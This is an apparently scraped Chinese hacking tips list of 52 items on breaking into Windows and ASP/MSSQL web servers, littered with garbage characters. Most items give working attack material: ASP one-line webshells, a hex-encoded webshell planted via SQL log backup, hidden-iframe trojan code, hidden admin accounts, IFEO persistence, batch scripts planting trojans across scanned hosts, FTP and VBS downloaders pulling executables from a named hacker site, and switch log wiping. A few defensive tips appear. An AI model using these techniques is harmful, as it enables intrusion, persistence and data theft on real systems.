Xp系统修改权限防止病毒或木马等破坏系统,cmd下,4 x% ~# N0 Y1 X( X* t
cacls C:\windows\system32 /G hqw20:R
$ }( |. m6 J& N9 f: G5 h `( q思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入9 _/ \# h1 X2 H. o4 I; p) h* {
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F+ Z0 d, h& B0 p8 V0 `" C3 t0 f
. G$ X W# v3 y; R7 P: v; v1 [2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
4 @4 C7 V7 @; N, l9 u& l
! e" A1 h/ l) M3 k! j- x* z8 y3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。6 j4 j/ v$ G% t3 b- m
9 @% e$ B) |# t
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
X3 o1 j$ {1 v' f4 O. v* h% Q% W+ i8 G; t1 k5 a
5、利用INF文件来修改注册表
3 O4 w' R/ B+ x[Version]1 B) V4 n9 m/ A m3 d" g& z8 y- O
Signature="$CHICAGO$"- G/ K) l; { m. ]; ~& O, ?
[Defaultinstall]+ n; H2 o' z; X% j9 L
addREG=Ating0 R; y. t0 w( ~) g% p8 s
[Ating]% M0 w" Y) }9 C) d* x4 d: t9 F
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1", g* j: y' X4 ?2 g5 W+ |. d& H
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:& J: G1 T6 W- A4 g9 Z, Z
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径" n- Y. ~/ W. U* c+ @, H" Z
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
7 v4 {7 K2 `& _: }% zHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU( X& b% w/ V$ I4 B/ A
HKEY_CURRENT_CONFIG 简写为 HKCC
( T) `6 e# p$ `# p) m0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
, D8 E( T# a7 l" j D% D3 m"1"这里代表是写入或删除注册表键值中的具体数据! i {4 G& F q3 j0 K. X
" c: m6 x; z; C% W- M
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,3 p3 e; s8 u- o, C+ V2 T' F3 v
多了一步就是在防火墙里添加个端口,然后导出其键值/ u/ D: i: q6 o% a
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]+ D$ T% s* R0 U$ o
' _: @% P8 ~2 B3 v4 z9 d8 f1 x
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
3 |& j3 c7 V2 l0 p) w在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
$ Z6 @6 }5 k; D% n. P2 P' V9 J8 |5 t
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
2 ^* e6 t; M! U2 t8 C
- q7 ^, ^' V+ V9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
: q$ V; H8 p3 b0 H- b/ M可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。0 f7 f6 B* n! j% A2 @& o
. \' i9 |: {( D
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
( h2 x H! F! a2 e( r6 Y! \, k! Y3 L* r8 w3 R* m: f
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,8 s9 b6 }; j3 r! j$ G
用法:xsniff –pass –hide –log pass.txt( E! V3 X1 ^/ L5 ~/ C# s
/ i+ x2 b4 P' }" S7 U
12、google搜索的艺术8 u/ W6 n/ k, c0 x
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
# i s/ z5 Q2 I9 F x2 b- c/ g或“字符串的语法错误”可以找到很多sql注入漏洞。
6 |) I: I: h' j6 q3 f( [8 c7 h" Q/ `
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
( r. o0 M. ?4 e0 g# E( g) V
6 W9 n5 K- y6 ~/ c) w; U+ z J14、cmd中输入 nc –vv –l –p 1987
. g/ j$ @8 R; |6 z# t j做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
) Z' i5 V6 j9 c, }- I0 X: h9 z7 _& |+ b" h7 G
15、制作T++木马,先写个ating.hta文件,内容为
3 r! A/ e, }( g* X c$ H) O<script language="VBScript">
3 D% F" ^# x% B1 Qset wshshell=createobject ("wscript.shell" ). p* Q1 Q1 E* k) @" N, X# P# `
a=wshshell.run("你马的名称",1)
: Q5 ?2 a' Z+ S- Z, ~/ H; f$ I0 dwindow.close$ K C3 D% @6 t2 n- _
</script>% B! y5 \5 Y5 }0 J8 S* k+ o s& n
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。! z( z8 i$ S( d! f6 K* K* i1 k
. d* }) i9 I% f: Y' C1 k
16、搜索栏里输入
! b/ t; E) }* e" R/ s关键字%'and 1=1 and '%'='. ?; ]2 z5 E8 F8 Q% e, s/ R
关键字%'and 1=2 and '%'='$ y ~4 w; g O$ V' \& ]- Z
比较不同处 可以作为注入的特征字符9 ^) L' O; V N6 A2 k1 ?0 L; d
+ [- i t; O& b0 m
17、挂马代码<html>7 L9 g& F$ F% P S$ L
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>9 t+ C4 [, n$ [9 T& k
</html>- l8 h8 x" e, q2 \) P
6 o0 N$ o5 Y& T1 A+ x4 V) s18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,, i3 E: u: b0 R0 F
net localgroup administrators还是可以看出Guest是管理员来。
m' L- Y& b/ p7 B- ]- Y, @" I6 ~5 r6 Y
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
/ O5 v# @. o V) C/ f! |- p用法: 安装: instsrv.exe 服务名称 路径
/ s/ e* }: R6 K0 a# ~: k6 L- p卸载: instsrv.exe 服务名称 REMOVE; x3 _& L! \* w( |8 I
7 P" Z- D$ W& |7 |) Z& ?4 E8 U( ?" U/ I' K
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 o1 E; W) Y9 |+ }4 e w不能注入时要第一时间想到%5c暴库。
8 }3 Q8 u- ~7 ~# B4 |
) {6 J6 A7 m4 O8 d' W22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
& }! K8 H6 r v9 d6 }
% B8 k2 w( v& L+ j4 V- v3 A* y: p+ m23、缺少xp_cmdshell时) F, b1 \" a, u N
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'. X+ y. Y& y6 ^3 y2 O' s
假如恢复不成功,可以尝试直接加用户(针对开3389的)
3 _' R7 d9 X/ @2 l, A: rdeclare @o int3 ]6 V q- ?! ^+ J+ g
exec sp_oacreate 'wscript.shell',@o out
& g+ A7 G8 p& d* Y( M- _8 F, k0 f6 iexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员 c" _' S }& _3 }/ r
6 d9 M' v+ e% N4 M1 I/ K$ |) E
24.批量种植木马.bat
: _/ e3 C5 F5 U% Efor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
+ k- @4 E9 e5 J, U' c3 I+ cfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
% K0 z" m" c& J! D: C扫描地址.txt里每个主机名一行 用\\开头
3 ?$ }: K9 h2 B6 q2 x- z' O3 S$ d6 ?4 h5 z$ k% Q$ t: m! J* Y, `6 ]; L
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。8 \; R: r8 Y2 B% I4 H5 b
3 J- H! A9 c @ f5 A8 q' B
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
' l1 I/ r, h( v( F4 ?将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.+ J9 J1 j8 p' P
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
- M! W U8 c; w$ n g: z. O. E8 {; Z; s
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
5 f/ u% G' D( C, h然后用#clear logg和#clear line vty *删除日志- x# q; l- I1 z# ^. p6 h
/ I/ e$ G/ L5 l( _' F5 g
28、电脑坏了省去重新安装系统的方法
4 c: p- F; w0 E纯dos下执行,2 f3 ~' v! n5 M: `
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
) F+ ^$ A9 f/ E2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
, g" r/ t5 L- K8 b: P( u: h1 p$ g2 {5 G) Y
29、解决TCP/IP筛选 在注册表里有三处,分别是:
2 Z1 @; d( b* ~HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
# w& ~6 m# i# ZHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ _( Q/ F% y& {HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 k2 s- p: w& R& f) `% j7 A2 h分别用# A& u* ?- ?0 g% U4 U0 c. r6 s) [
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 ^( G, l" v+ K2 K1 s# Q9 M5 ?' oregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
2 [5 A1 U! |0 z( Z$ D6 jregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ c3 H" E. s3 w# G) B
命令来导出注册表项4 L+ v1 N5 w9 a- Q- o
然后把三个文件里的EnableSecurityFilters"=dword:00000001,. k) O+ {% l( K& c$ e/ B4 [1 I
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用/ U. y% H x6 I" e
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
* T! s0 t- c: ~6 T r2 o( `) ^ g; _7 h5 d3 @/ t
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
: L+ G/ G0 o+ G: V3 h+ J5 `SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3) V/ e, B. E# }' y
* g. b& v+ b# m- B+ O) M31、全手工打造开3389工具
% p9 ?2 k7 I H* l打开记事本,编辑内容如下:
: r+ L2 N1 X1 v2 @( @0 {8 \echo [Components] > c:\sql. y R5 j" N5 Q7 S, X" P/ _! O
echo TSEnable = on >> c:\sql9 f% `# N7 x4 p5 J
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q# k- B2 j* X( }: w; P( g& a
编辑好后存为BAT文件,上传至肉鸡,执行9 o+ p$ h; O- x- J3 \, Q0 z T7 o6 i8 R
2 {$ ^; \: B7 _" k2 B32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马6 Y' {; N O; E! R
/ e4 X0 V8 B5 F# [
33、让服务器重启
7 }! Q. N. r$ B F, ~! |( {写个bat死循环:1 W4 m: J: W- M( F
@echo off
& R. e! S5 b) w y:loop13 |9 K. V/ p9 R' I/ T" N4 Y" G
cls: D: W" S$ E+ Y# ^4 T
start cmd.exe: N1 B0 u& k+ ]) Q" U" [- `
goto loop1! W: m. y* t: c# x7 D
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
: c, b) \9 ~. I+ G
' k0 ^. ]4 I" h H34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
7 e$ h7 f8 B+ Z) ]@echo off; Y( b9 U" ]9 Y2 h
date /t >c:/3389.txt- k& N8 C# C- n7 a+ e6 A3 X
time /t >>c:/3389.txt
: f( {7 Z3 h: Cattrib +s +h c:/3389.bat& o& d/ E. q; z7 r8 B
attrib +s +h c:/3389.txt
# s2 a( ]* L' C6 R' v. Lnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt4 ~; Q% R/ q1 r3 M8 J1 f+ x% J' j) @
并保存为3389.bat
1 h/ `9 c; @, s% c5 s1 u' G打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
* L9 m. ]: d3 U4 V2 [9 x/ i- o$ c. [4 c
35、有时候提不了权限的话,试试这个命令,在命令行里输入:2 Y7 C. j! d0 d+ V2 L/ a5 P; b
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)0 W$ Q: c: r8 A3 |
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。% P1 x9 L3 P' `$ j0 `, ?
1 U9 N! R4 ^6 o1 Z, b& w' @& `: S36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
) w2 u9 |! m, F* I1 c- T2 secho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
% Z7 {4 C/ h+ f7 Becho 你的FTP账号 >>c:\1.bat //输入账号
1 [5 p7 A# v1 L( r) necho 你的FTP密码 >>c:\1.bat //输入密码
5 [0 R) H9 ?+ e* T* ^% i) Necho bin >>c:\1.bat //登入
* I: H- A3 Y; c# W3 gecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
n# w' ?% T9 a0 N3 l7 Jecho bye >>c:\1.bat //退出
1 _+ L9 o: ^! S9 h% [9 g1 E; h然后执行ftp -s:c:\1.bat即可: @9 r: w" J1 S- k- [5 v
3 S3 Z( V+ R* b6 W1 a5 p" i+ }
37、修改注册表开3389两法: ?4 m1 E2 Y$ o2 b$ c+ X! z
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表0 G& C1 T* G4 ]: z
echo Windows Registry Editor Version 5.00 >>3389.reg
( N8 `2 V+ b8 w: l- ~) s5 secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg- |; r4 v+ K# F5 v. l. Z0 Y
echo "Enabled"="0" >>3389.reg* r' w/ Y2 l D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
0 E' T: O' K% k1 x( s( X* v+ QNT\CurrentVersion\Winlogon] >>3389.reg# c, J5 f3 p6 @/ Q9 f
echo "ShutdownWithoutLogon"="0" >>3389.reg4 {' ~- s3 P9 r" x% t0 O, M4 ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
r2 w+ V2 z* e>>3389.reg# o- Z' V8 x! @9 K
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ F; K9 z& b S7 X" fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
M* k. M) ]6 m/ D8 l5 |% F>>3389.reg
! o; @0 I" @4 J& W Pecho "TSEnabled"=dword:00000001 >>3389.reg
; A2 ]! R# J9 e9 U4 D, l8 |: ^$ uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg2 R5 J) ^+ L* V0 ~9 o, ~; n
echo "Start"=dword:00000002 >>3389.reg3 [2 B+ C" g) {6 y7 t9 E' q+ k5 N, o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]9 b' m' T" i. o) h
>>3389.reg$ v1 \: Y; M7 A2 w! q
echo "Start"=dword:00000002 >>3389.reg& O- |/ @- }4 D1 o) f e3 q
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
* ?2 J5 i+ z; p7 h& w" cecho "Hotkey"="1" >>3389.reg! q; ?$ b/ S3 u6 Q6 s5 Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# o8 A5 P! w4 c* ?' Z% @, \$ u
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
4 v6 _/ ~+ g becho "PortNumber"=dword:00000D3D >>3389.reg
4 L7 {- K; l. j% d/ g' Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% j" N3 g; V! j' {; C
Server\WinStations\RDP-Tcp] >>3389.reg
4 W& p% `0 [) ^6 Iecho "PortNumber"=dword:00000D3D >>3389.reg4 X" l, [% _0 i$ i
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
8 _8 q, H7 e# \(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
! c) p A4 Q8 T5 V: g; ? r D, n因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效3 Y% ]5 L# P6 z6 t' y- Q* Z( i1 \
(2)winxp和win2003终端开启9 I) O9 B: \! s( ]7 I& o4 A
用以下ECHO代码写一个REG文件:( k A9 Q% h1 @
echo Windows Registry Editor Version 5.00>>3389.reg
. C& v5 G. ~# u4 hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 v3 l0 b0 P/ O" F2 y+ Z- ]: u
Server]>>3389.reg
- s' I' I7 r/ s9 r/ s4 Fecho "fDenyTSConnections"=dword:00000000>>3389.reg5 {1 d+ D6 n' _) ?4 j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 y4 r0 A4 `7 _5 P6 |2 R
Server\Wds\rdpwd\Tds\tcp]>>3389.reg3 ] [ u0 c" h. t* W& j
echo "PortNumber"=dword:00000d3d>>3389.reg
2 G5 }; r3 h0 C, W v* @! uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# }' e* D0 k% V6 i4 u* fServer\WinStations\RDP-Tcp]>>3389.reg' W' c: }/ Q+ y t! F4 f
echo "PortNumber"=dword:00000d3d>>3389.reg# L6 }! n' Q8 k( H
然后regedit /s 3389.reg del 3389.reg
3 w/ i: j2 F, n$ A5 `* ?: aXP下不论开终端还是改终端端口都不需重启
) [" h1 h; Z" Y5 E( n* ^2 G
9 K" [5 Z: `0 h" [38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃/ U$ P1 b% |6 J% D5 Q" _/ Q) T
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
) T" U5 A* Y7 Q9 D) `( {0 ]) P# p9 l3 H+ {
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!' B$ f3 |0 I$ K9 m9 R* M. N( V
(1)数据库文件名应复杂并要有特殊字符
5 d5 R$ s8 L- o% J1 h5 a$ e1 \# t(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
) E4 @% x6 p }0 I) c3 u( ~将conn.asp文档中的
$ u2 v6 ^; n; m: jDBPath = Server.MapPath("数据库.mdb")
9 k- B9 v; w! t# Nconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath& `) y% |3 e, _; a, o$ Z8 w
, K6 D' Z' }7 r$ ~
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置' N0 G5 E$ N* Y; F- f. _
(3)不放在WEB目录里
0 y& |0 j& k9 i- k0 v( v. n( x2 }7 s' G4 ~# ?- a. P" w5 t
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
; S# v, I2 m: q可以写两个bat文件
- c4 n$ D# v) B@echo off
9 _0 N8 S- {1 A@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
3 J# Z; n) s. l4 k+ a4 r@del c:\winnt\system32\query.exe$ v- d7 a5 j2 q4 U/ Z% r
@del %SYSTEMROOT%\system32\dllcache\query.exe
* O3 B' e `3 b5 _9 S@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
3 `2 N3 W# |1 @3 t0 W! Z, V4 Z: J( k# K
@echo off8 h& x, E& q( j0 f7 G% t
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
: A! ?- O) Y& e; M- S@del c:\winnt\system32\tsadmin.exe
" {0 ^- P. u2 t( t8 v/ r; ^@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex7 v% b7 r& X+ }) [
, r" ~+ u) T( r' U w
41、映射对方盘符
' j; J6 p" w8 }& b4 Q; d9 stelnet到他的机器上,
! u( j7 H1 V6 n% x, g' \" z$ Cnet share 查看有没有默认共享 如果没有,那么就接着运行. p$ a: n. s# X1 ~7 c! C
net share c$=c:
# M: D5 Y0 D% Enet share现在有c$
! H( b% i& R1 Q; B4 d在自己的机器上运行
3 j- l& J4 x' t1 u9 e6 S6 rnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
% ~2 n2 t/ j) e5 b9 T% n
' G7 O/ k1 u2 `! x9 G% U E! \7 p42、一些很有用的老知识
9 Z+ O9 R% f S/ \+ r2 I+ Dtype c:\boot.ini ( 查看系统版本 )2 m2 e( Y. i3 i/ Q
net start (查看已经启动的服务)
! I: C3 s. x7 e% _query user ( 查看当前终端连接 )" b1 L) q+ U4 s, d3 f
net user ( 查看当前用户 )
# i! M' J3 \! m: J) Qnet user 用户 密码/add ( 建立账号 )7 [/ |3 v% x' ~+ T
net localgroup administrators 用户 /add (提升某用户为管理员)) G {# y( B/ A# I. d; Q& l6 _
ipconfig -all ( 查看IP什么的 )
$ ]* @5 o/ \+ \: c) Nnetstat -an ( 查看当前网络状态 )
4 u# @7 ]5 [' k' V+ r" tfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)/ Y# c6 F, e; `4 d
克隆时Administrator对应1F4 h% K6 A d( f) E/ P
guest对应1F5
2 V- \" V- e4 ntsinternetuser对应3E8
/ o# T4 L- C9 U: k: n; t9 e- e: l& @+ G8 f! p
43、如果对方没开3389,但是装了Remote Administrator Service4 M( y) _7 v! w. v
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接9 J8 F9 r$ z. A8 Y' Q2 j1 T! l! c0 W
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息; `* y! r! _2 A! f+ F* ?$ |7 n# {6 s
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin", S! I, \8 y% r
" O! O8 J% r% y
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)* r! y1 p: x7 {' L: p
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
& V1 }7 B; z5 D
! w7 P. m5 o* I/ O; B* Q2 T" } }45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
! {% t3 Q4 p. [ O( fecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open# z8 n/ ?! L) a4 Y
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
2 [) h& z& A2 x1 {, sCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =- X, V0 @, K- X1 p4 B" k
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
) I* z2 c5 i2 Z: @) Q(这是完整的一句话,其中没有换行符)* I6 I+ h' b8 g( v
然后下载:
- _2 \# ?( R6 V7 ^cscript down.vbs http://www.hack520.org/hack.exe hack.exe" A8 G4 z* K1 k! ?/ q9 u' `
/ R. ~7 R& [0 \" t0 m& j& t46、一句话木马成功依赖于两个条件:: ?+ m! o: v( x8 g% @
1、服务端没有禁止adodb.Stream或FSO组件- S k7 w* R$ e
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。! r- y5 V+ |- g9 c
% Z1 F: M: f6 W; _ I3 x$ I: A47、利用DB_OWNER权限进行手工备份一句话木马的代码:# l5 m2 ?' D4 X) k+ [* U1 B0 c
;alter database utsz set RECOVERY FULL--
p$ b- N! K8 s, R, ]& o$ w;create table cmd (a image)-- O7 x" |& ?' W, \5 N" s, B
;backup log utsz to disk = 'D:\cmd' with init--
( m) m" }% }+ q2 ]9 s6 x;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
& r2 N* U' z) }+ |$ k" j;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
' S. F$ e& _9 P/ n1 N注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。2 x" m* }" e: L
0 u7 C; e' ~5 C0 _ t7 }+ G. K48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
. Z* Z1 r7 i( X- F
) }) L4 p( G4 Z用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
t9 u7 e, @* i2 Z所有会话用 'all'。) ~, M5 ]" ]( S
-s sessionid 列出会话的信息。* J }7 y' Z0 s/ R3 u) m8 ~
-k sessionid 终止会话。
" D& X9 d- P- B% @-m sessionid 发送消息到会话。
3 L" g |6 m" M$ ]% F! D5 {
0 w8 }2 I( r/ X' Q& J$ Wconfig 配置 telnet 服务器参数。
' _- _1 e' f4 T4 S; [5 v! U2 K, }+ `' B
common_options 为:
7 i4 J# B* d0 e' |) d# Q-u user 指定要使用其凭据的用户
5 M" `7 D' w. @% Q- L! L-p password 用户密码; ]7 Q; y% i4 @) j7 g1 h k: b
* z) ~. R( u6 t8 e' ^' c
config_options 为:
1 K/ ~! U( s* q; _# \2 Cdom = domain 设定用户的默认域
# T/ D$ n3 Z0 h7 s2 K. d, \ctrlakeymap = yes|no 设定 ALT 键的映射
2 E# N% K- p( b* ]$ Dtimeout = hh:mm:ss 设定空闲会话超时值
& v- U0 i% G( \( F6 q5 M' f. ztimeoutactive = yes|no 启用空闲会话。1 Y5 I9 e1 v4 v$ Y
maxfail = attempts 设定断开前失败的登录企图数。# y/ k+ U: ?- x9 p: O+ {
maxconn = connections 设定最大连接数。8 v& T7 ^% @6 ]
port = number 设定 telnet 端口。
9 X5 u3 @+ t1 U$ H% ]sec = [+/-]NTLM [+/-]passwd
. D/ p4 Q+ l: R7 g( ]/ c设定身份验证机构
- S6 P1 D4 r t- G7 Kfname = file 指定审计文件名。5 a$ {" Y6 s2 ]" n' t* _: Z" S
fsize = size 指定审计文件的最大尺寸(MB)。
/ V& E4 L7 p0 T8 a; u: amode = console|stream 指定操作模式。
2 p6 O9 L2 M2 T1 P2 I: hauditlocation = eventlog|file|both
8 g" B% _( b% }3 W& d0 A指定记录地点- x A* i v! k, z- ]8 L
audit = [+/-]user [+/-]fail [+/-]admin' ?" y3 T, O7 v3 u
7 n0 V- h+ I- E49、例如:在IE上访问:
! C6 S% y/ m. v8 Ewww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
7 G& J: N0 {7 n. x! G2 Yhack.txt里面的代码是:
1 e7 ?. n4 H' X2 P( A<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">0 k5 u. ?8 i+ M/ J; G
把这个hack.txt发到你空间就可以了!
, b2 ?; @) H |2 W这个可以利用来做网马哦!% s2 u$ B/ w+ o& f7 M5 v
4 [( Z$ |* S( J, ?* d7 g4 g
50、autorun的病毒可以通过手动限制!, p9 l) b1 h& ]6 @8 @+ B C& o8 @
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
7 w8 |4 @+ H* q/ x0 o: @5 H: u2,打开盘符用右键打开!切忌双击盘符~0 n8 F1 M( I4 V' \* x, R' V
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!; @; ~9 n+ z& L! [
% d, T/ z S1 |& R, Q. y+ l: _51、log备份时的一句话木马:
|( D$ t' _+ E0 ia).<%%25Execute(request("go"))%%25> e- g# C5 K2 H' g* z$ U8 r$ O0 }
b).<%Execute(request("go"))%>* S+ F1 ~% C! x, O+ I, T' L
c).%><%execute request("go")%><%( N' g8 N3 D, d8 _& F7 h
d).<script language=VBScript runat=server>execute request("sb")</Script>
$ c V2 ~- v/ t* ?e).<%25Execute(request("l"))%25>
( }* _- |( [ V2 D4 vf).<%if request("cmd")<>"" then execute request("pass")%>' E7 R4 m+ }: R/ H8 A- @: S
Z8 X% W/ \$ ~# m0 B4 p
52、at "12:17" /interactive cmd6 k) U2 l7 E1 `- G+ g; W( M
执行后可以用AT命令查看新加的任务
* t, F9 y7 J4 c" q用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
